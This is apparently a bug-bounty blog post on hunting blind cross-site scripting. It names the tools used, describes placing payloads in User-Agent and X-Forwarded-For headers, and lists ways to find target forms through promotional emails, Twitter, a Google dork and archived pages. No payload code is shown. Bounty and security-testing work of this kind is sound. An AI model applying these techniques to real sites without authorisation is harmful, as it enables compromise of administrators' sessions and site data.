Many people ask me, How I perform Blind XSS and what tools I use to get results. In this blog, I will explain, How I achieve blind XSS and what tools I use.
Tools I use to get Blind Xss result
- www.blindf.com (A simple but effective framework)
- Burp Suite
- Custom UserAgent String (Browser Extension) [https://addons.mozilla.org/en-US/firefox/addon/custom-user-agent-revived/]
www.blindf.com is very simple and effective framework because if you don’t find XSS, you can get Blind HTML Injection vulnerability with it. So more chances to get vulnerability. Another good thing is if Blind HTML Injection fires, you can try different Bxss payloads.
Burp Suite: I use burp to modify my headers like user-agent and x-forwarded-for and put my Bxss payloads in them.
Custom UserAgent String: Its a very useful browser agent and you can replace user-agent value right from the browser if don’t want to use burp. Just put your Blind XSS payload in the setting and visit your target.
How I find endpoints:
- I follow my target on twitter. So that I get information about their latest or upcoming products(Sometimes new forms like survey/feedback)
- Most important, Do not delete promotional emails. You will find new forms in them to test the Blind XSS Attacks. I have earned more than $5000 for Blind XSS using promotional emails.
- There are two things- first, go with the flaw of the website. Second, perform an action against the website so that you will get the mail and probably the new forms. For eg., you performed some action and admin blocked your account then you get mail if it is a mistake fill the below form.
- Try to find forms using google search. I do it by this dork, site:xyz.com intext: Firstname
- There are other known methods like finding endpoints from js files and Wayback machine etc.
I hope this information will help you to find Blind Xss, Blind Html injection. You can also find SSRF using the above methods.